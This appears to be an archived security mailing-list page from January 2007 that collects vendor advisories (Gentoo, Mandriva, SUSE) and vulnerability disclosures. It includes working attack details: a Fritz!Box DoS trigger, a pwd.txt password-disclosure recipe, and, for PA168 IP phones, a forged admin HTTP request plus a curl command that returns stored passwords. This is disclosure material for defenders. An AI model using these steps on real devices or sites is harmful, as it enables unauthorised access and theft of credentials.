ftp://ftp.avm.de/fritz.box/fritzbox.fon_wlan_7050/firmware/

Matthias

[EMAIL PROTECTED] wrote:
 Denial of Service against AVM Fritz!Box 7050 (and others)
 
 Discovered by: Matthias Wenzel
 Advisory: http://mazzoo.de/blog/2007/01/18#FritzBox_DoS
 
 Manufacturer: AVM (www.avm.de)
 Product: Fritz!Box 750 (and others)
 
 Vendor was notified 6 month ago (see blog entry by Matthias)
 
 Sending a zero-length UDP packet to port 5060 (SIP) of a AVM Fritz!Box will
 crash the VoIP-telephony application. This works from any IP-interface,
 including the DSL line.
 
 
 Collin (only delivering the message to FD and BugTraq)
 
 
 



[ GLSA 200701-18 ] xine-ui: Format string vulnerabilities

2007-01-23 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200701-18
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: xine-ui: Format string vulnerabilities
  Date: January 23, 2007
  Bugs: #161558
ID: 200701-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


xine-ui improperly handles format strings, possibly allowing for the
execution of arbitrary code.

Background
==

xine-ui is a skin-based user interface for xine. xine is a free
multimedia player. It plays CDs, DVDs, and VCDs, and can also decode
other common multimedia formats.

Affected packages
=

---
 Package  /   Vulnerable   /Unaffected
---
  1  xine-ui  0.99.5_pre20060716= 0.99.5_pre20060716

Description
===

Due to the improper handling and use of format strings, the
errors_create_window() function in errors.c does not safely write data
to memory.

Impact
==

An attacker could entice a user to open a specially crafted media file
with xine-ui, and possibly execute arbitrary code.

Workaround
==

There is no known workaround at this time.

Resolution
==

All xine-ui users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose 
=media-video/xine-ui-0.99.5_pre20060716

References
==

  [ 1 ] CVE-2007-0254
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0254

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200701-18.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


pgpNy2aB7zikc.pgp
Description: PGP signature


[ MDKSA-2006:217-2 ] - Updated proftpd packages fix vulnerabilities

2007-01-23 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory   MDKSA-2006:217-2
 http://www.mandriva.com/security/
 ___
 
 Package : proftpd
 Date: January 23, 2007
 Affected: Corporate 3.0
 ___
 
 Problem Description:
 
 A stack-based buffer overflow in the sreplace function in ProFTPD 1.3.0
 and earlier, allows remote attackers to cause a denial of service, as
 demonstrated by vd_proftpd.pm, a ProFTPD remote exploit.
 (CVE-2006-5815)

 Buffer overflow in the tls_x509_name_oneline function in the mod_tls
 module, as used in ProFTPD 1.3.0a and earlier, and possibly other
 products, allows remote attackers to execute arbitrary code via a large
 data length argument, a different vulnerability than CVE-2006-5815.
 (CVE-2006-6170)

 ProFTPD 1.3.0a and earlier does not properly set the buffer size limit
 when CommandBufferSize is specified in the configuration file, which
 leads to an off-by-two buffer underflow.  NOTE: in November 2006, the
 role of CommandBufferSize was originally associated with CVE-2006-5815,
 but this was an error stemming from an initial vague disclosure. NOTE:
 ProFTPD developers dispute this issue, saying that the relevant memory
 location is overwritten by assignment before further use within the
 affected function, so this is not a vulnerability. (CVE-2006-6171)

 Packages have been patched to correct these issues.

 Update:

 The update for the Corporate 3.0 platforms had a bad patch for
 CVE-2006-5815, which prevented some clients from being able to use the
 server. This update corrects this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5815
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6170
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6171
 ___
 
 Updated Packages:
 
 Corporate 3.0:
 98a60448e690842a0afe6cb50925ceeb  
corporate/3.0/i586/proftpd-1.2.9-3.7.C30mdk.i586.rpm
 9aee5e7d355fa8b730a79f4a58df  
corporate/3.0/i586/proftpd-anonymous-1.2.9-3.7.C30mdk.i586.rpm 
 1cf5d2e63700ee924b0346bdd72505d9  
corporate/3.0/SRPMS/proftpd-1.2.9-3.7.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 a3baa6cdea37f84a99c24b4c3c681ca6  
corporate/3.0/x86_64/proftpd-1.2.9-3.7.C30mdk.x86_64.rpm
 de981e7a4a3eec5371a31079c50d5c17  
corporate/3.0/x86_64/proftpd-anonymous-1.2.9-3.7.C30mdk.x86_64.rpm 
 1cf5d2e63700ee924b0346bdd72505d9  
corporate/3.0/SRPMS/proftpd-1.2.9-3.7.C30mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFFtmozmqjQ0CJFipgRAhtpAKCWjInDTsN+klJssg25l46lYy3TGwCgrFLL
eC5oR5Z7A0UFcICGSPfmnJo=
=/+m9
-END PGP SIGNATURE-



RANDOM PHP QUOTE 1.0 (pwd.txt) Remote Password Disclosur

2007-01-23 Thread the . tiger100
#
#RANDOM PHP QUOTE 1.0 (pwd.txt) Remote Password Disclosur
#
#
#scrip : 
http://www.scriptsez.net/download/download.php?action=downloadp=random_php_quote.zipns=1
#
#
#discovered by : ThE TiGeR 100
#
#
#Exploit : 
#
#http://www.site.com/[path]/pwd.txt
#or
#http://www.site.com/pwd.txt 
#
#then crack the password with bass64 decode 
#
#
#Contact:[EMAIL PROTECTED]
#
#
#GreetZ to str0k ;)
#
# Your Time is UpMy Time Is Now,
# You Can't See Me My Time Is Now
#


[ GLSA 200701-19 ] OpenLDAP: Insecure usage of /tmp during installation

2007-01-23 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200701-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
 Title: OpenLDAP: Insecure usage of /tmp during installation
  Date: January 23, 2007
  Bugs: #159508
ID: 200701-19

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A shell script commonly released with OpenLDAP makes insecure usage of
files in /tmp during the emerge process.

Background
==

OpenLDAP Software is an open source implementation of the Lightweight
Directory Access Protocol.

Affected packages
=

---
 Package   /   Vulnerable   /   Unaffected
---
  1  net-nds/openldap  2.1.30-r10   = 2.1.30-r10
  = 2.2.28-r7
  = 2.3.30-r2
 net-nds/openldap   2.2.28-r7   = 2.1.30-r10
  = 2.2.28-r7
  = 2.3.30-r2
 net-nds/openldap   2.3.30-r2   = 2.1.30-r10
  = 2.2.28-r7
  = 2.3.30-r2

Description
===

Tavis Ormandy of the Gentoo Linux Security Team has discovered that the
file gencert.sh distributed with the Gentoo ebuild for OpenLDAP does
not exit upon the existence of a directory in /tmp during installation
allowing for directory traversal.

Impact
==

A local attacker could create a symbolic link in /tmp and potentially
overwrite arbitrary system files upon a privileged user emerging
OpenLDAP.

Workaround
==

There is no known workaround at this time.

Resolution
==

All OpenLDAP users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose net-nds/openldap

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200701-19.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


pgp6d8a3JWcbm.pgp
Description: PGP signature


PR06-14: IP Phones based on Centrality Communications/Aredfox PA168 chipset weak session management vulnerability

2007-01-23 Thread ProCheckUp Research

PR06-14: IP Phones based on Centrality Communications/Aredfox PA168
chipset weak session management vulnerability

This advisory has been published following consultation with UK NISCC
[http://www.niscc.gov.uk/]

Date Found: 3rd November 2006

Date Public: 22nd January 2007

Vulnerable:

Phones confirmed to be vulnerable:

- ATCOM AT-320ED IP Phone running SIP firmware version V1.42 and 1.54
- SOYO G668 Ethernet IP Phone running SIP firmware version v1.42

The following vendors/models also use the same PA168 chipset/firmware
and are therefore most likely to be vulnerable to the same issue:

- AriaVoice
- AT-323 from ATcom
- JR168_100B from IPLink
- JR168_100W from IPLink
- JR168_200 from IPLink
- Netweb-401/402 from NetWebGroup
- OB-WAN VoIP: Ethernet#1 and Ethernet#2 phones are PA168-based
- Vida some phones PA168 based
- Wuchuan HOP-1001/1002/1003
- Giptel IP phones G100, also Siptronic ST-100 and Siptronic ST-150
(PA168S chipset)
- GNET some phones PA168x based
- KE1020 Netphone (Meritline)
- ML210 Meritline
- Integrated Networks IN-1002. Found on eBay.
- ArtDio IPF-2000 and IPF-2002L phones
- Perfectone IP300

Severity: Medium

Author: Adrian Pastor [adrian.pastor-AT-procheckup.com] from ProCheckUp

CVE Candidate: Not assigned

Overview:

There is a problem with the way IP Phones using the PA168 chipset handle
authenticated sessions, allowing remote attackers to gain access to the
admin web console running as superuser.

Description:
When the superuser account authenticates to the admin web console, a
request such as the following is sent to the IP phone's web server:

POST /a HTTP/1.1
Referer: http://192.168.1.100/
Host: 192.168.1.100
Content-Length: 31

auth=12345678login=+++Login+++

At this point, the superuser session is considered *active* by the web
server. All it takes for attackers to perform an administrative task at
this point, is for them to send a well-formed request to the web server.
Since no authentication tokens or password are submitted within the HTTP
requests, anyone can perform administrative tasks while the session is
active. Even if the attacker sends the administrative requests from an
IP address different to the one used by the superuser account, the IP
Phone's web server would accept them as long as the superuser's session
is still active.

A script called active-session-attack.sh has been created, which
remotely checks repeatedly until a superuser account has logged on by
sending a forged superuser request every five seconds. As soon as the
superuser session becomes active, the following information will be
obtained from the settings page, and emailed to the attacker:

- IP phone's superuser password - grants administrative access
- IP phone's user password - grants restricted access
- SIP gateway hostname/IP address
- SIP account username
- SIP account PIN number

REQUEST:

POST /g HTTP/1.1
Host: 192.168.1.100
Content-Length: 13

back=++Back++


RESPONSE (output has been partially omitted for clarification):

HTTP/1.1 200 OK
Content-Length: 16727
Content-Type: text/html
Connection: close

TITLEIP Phone V1.54/TITLE

[output omitted]

INPUT name=sipproxy value=sip.test.com
INPUT name=domain value=sip.test.com
INPUT name=account value=myaccount size=24 maxlength=32
INPUT name=pin type=password value=1234
INPUT name=superpassword type=password value=12345678
INPUT name=password type=password value=1234

[output omitted]


In order to test this vulnerability, the following steps have been provided:

1. Log into http://192.168.1.100 from computer A using the superuser
password ('12345678' by default)

2. Send the following curl command from computer B:

curl -d back=++Back++ http://192.168.1.100/g

3. The administrative settings page should be returned without any
password required.

Note: the IP phone's web server is enabled by default

Fix:

Use access control lists on routers or firewalls in order to only allow
trusted IP addresses to access ATCOM AT-320ED IP Phone's web server.
Exposing the PA168-based IP Phone's admin web server on the Internet is
not recommended.

References:

http://www.voip-info.org/wiki/view/PA168
http://www.centralitycomm.com/
http://www.aredfox.com/eindex.htm
http://www.atcom.cn/En_products_At320ED.html
http://www.soyogroup.com/products/proddesc.php?id=307
http://www.procheckup.com/Vulner_2007.php

Legal:

Copyright 2006 ProCheckUp Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if the Bulletin is not changed or edited in any way, is attributed
to ProCheckUp indicating this web page URL
[http://www.procheckup.com/Vulner_PR0614.php], and provided such
reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. ProCheckUp is not
liable for any misuse of this information by any third party.

ProCheckUp is not responsible for the content of external Internet sites.



SUSE Security Announcement: xine (SUSE-SA:2007:013)

2007-01-23 Thread Thomas Biege

-BEGIN PGP SIGNED MESSAGE-

__

SUSE Security Announcement

Package:xine-ui,xine-lib,xine-extra,xine-devel
Announcement ID:SUSE-SA:2007:013
Date:   Tue, 23 Jan 2007 08:00:00 +
Affected Products:  SUSE LINUX 9.3
SUSE LINUX 10.0
SUSE LINUX 10.1
openSUSE 10.2
SUSE SLED 10
SLE SDK 10
Vulnerability Type: remote code execution
Severity (1-10):4
SUSE Default Package:   no
Cross-References:   CVE-2007-0017

Content of This Advisory:
1) Security Vulnerability Resolved:
 format string bug
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
none
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   This update fixes several format string bugs that can be exploited remotely
   with user-assistance to execute arbitrary code.
   Since SUSE Linux version 10.1 format string bugs are not exploitable
   anymore. (CVE-2007-0017)


2) Solution or Work-Around

   No temporary work-around known.

   
3) Special Instructions and Notes

   none


4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update (YOU) tool. YOU detects which updates are required and
   automatically performs the necessary steps to verify and install them.
   Alternatively, download the update packages for your distribution manually
   and verify their integrity by the methods listed in Section 6 of this
   announcement. Then install the packages using the command

 rpm -Fhv file.rpm

   to apply the update, replacing file.rpm with the filename of the
   downloaded RPM package.

   
   x86 Platform:
   
   openSUSE 10.2:
   
ftp://ftp.suse.com/pub/suse/update/10.2/rpm/i586/xine-devel-1.1.2-40.1.i586.rpm
  2cacbb4f4e177362149518481480165a
   
ftp://ftp.suse.com/pub/suse/update/10.2/rpm/i586/xine-extra-1.1.2-40.1.i586.rpm
  73cbdd8d443596547875804bd8e2ca8f
   ftp://ftp.suse.com/pub/suse/update/10.2/rpm/i586/xine-lib-1.1.2-40.1.i586.rpm
  2114f7c6a4c8351adab588c173419778
   ftp://ftp.suse.com/pub/suse/update/10.2/rpm/i586/xine-ui-0.99.4-84.1.i586.rpm
  5d4dd945a812ba0b17619c267ec8f2b5
   
   SUSE LINUX 10.1:
   
ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/xine-extra-1.1.1-24.17.i586.rpm
  3eb1465401e5e1c6f36d8e2d7ca3e114
   
ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/xine-lib-1.1.1-24.17.i586.rpm
  e2fbf53b629e835dbc2558e87fabf926
   
ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/xine-ui-0.99.4-32.14.i586.rpm
  d710db4b4d20f7ea4485d16845cb4be2
   
   SUSE LINUX 10.0:
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/xine-extra-1.1.0-0.1.i586.rpm
  06753ebd3608223077c95c01f8bc3122
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/xine-lib-1.1.0-0.1.i586.rpm
  60ab4fd7c193d687d9484e5691aa3f01
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/xine-ui-0.99.4-84.1.i586.rpm
  4bc3f28d7e600fbb78c65f6b0dcfc436
   
   SUSE LINUX 9.3:
   
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/xine-lib-1.0-10.14.i586.rpm
  c944ed72f913771f0c2300883573e111
   
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/xine-ui-1.0-10.14.i586.rpm
  cee2a8a9669b429dde4e465e83aae70f
   
   Power PC Platform:
   
   openSUSE 10.2:
   ftp://ftp.suse.com/pub/suse/update/10.2/rpm/ppc/xine-lib-1.1.2-40.1.ppc.rpm
  a1fcfa82deed685446a213439639a579
   ftp://ftp.suse.com/pub/suse/update/10.2/rpm/ppc/xine-ui-0.99.4-84.1.ppc.rpm
  bc2dcf2266dbb56b1a0291209aad2dd7
   
   SUSE LINUX 10.1:
   
ftp://ftp.suse.com/pub/suse/update/10.1/rpm/ppc/xine-extra-1.1.1-24.17.ppc.rpm
  c337440571123263478dd2a64059a4e8
   ftp://ftp.suse.com/pub/suse/update/10.1/rpm/ppc/xine-lib-1.1.1-24.17.ppc.rpm
  3cf476901522d7b5abd5bf3cb18484a9
   ftp://ftp.suse.com/pub/suse/update/10.1/rpm/ppc/xine-ui-0.99.4-32.14.ppc.rpm
  a9e762bad246963a7564c1f36a5f0392
   
   SUSE LINUX 10.0:
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/xine-extra-1.1.0-0.1.ppc.rpm
  930dc314de3ab49a8655e6cdb89ff50d
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/xine-lib-1.1.0-0.1.ppc.rpm
  ddd255708abfb433a3497d790491be55
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/xine-ui-0.99.4-84.1.ppc.rpm
  827125d558472b685f0f1843d0eb3850
 

[ GLSA 200701-17 ] libgtop: Privilege escalation

2007-01-23 Thread Matthias Geerdsen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200701-17
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: libgtop: Privilege escalation
  Date: January 23, 2007
  Bugs: #162169
ID: 200701-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


libgtop improperly handles filenames, possibly allowing for the
execution of arbitrary code.

Background
==

libgtop facilitates the libgtop_daemon, which is used by GNOME to
obtain information about remote systems.

Affected packages
=

---
 Package /  Vulnerable  /   Unaffected
---
  1  gnome-base/libgtop   2.14.6= 2.14.6

Description
===

Liu Qishuai discovered that glibtop_get_proc_map_s() in
sysdeps/linux/procmap.c does not properly allocate memory for storing a
filename, allowing certain filenames to cause the buffer to overflow on
the stack.

Impact
==

By tricking a victim into executing an application that uses the
libgtop library (e.g. libgtop_daemon or gnome-system-monitor), a local
attacker could specify a specially crafted filename to be used by
libgtop causing a buffer overflow and possibly execute arbitrary code
with the rights of the user running the application.

Workaround
==

There is no known workaround at this time.

Resolution
==

All libgtop users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =gnome-base/libgtop-2.14.6

References
==

  [ 1 ] CVE-2007-0235
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0235

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200701-17.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



signature.asc
Description: OpenPGP digital signature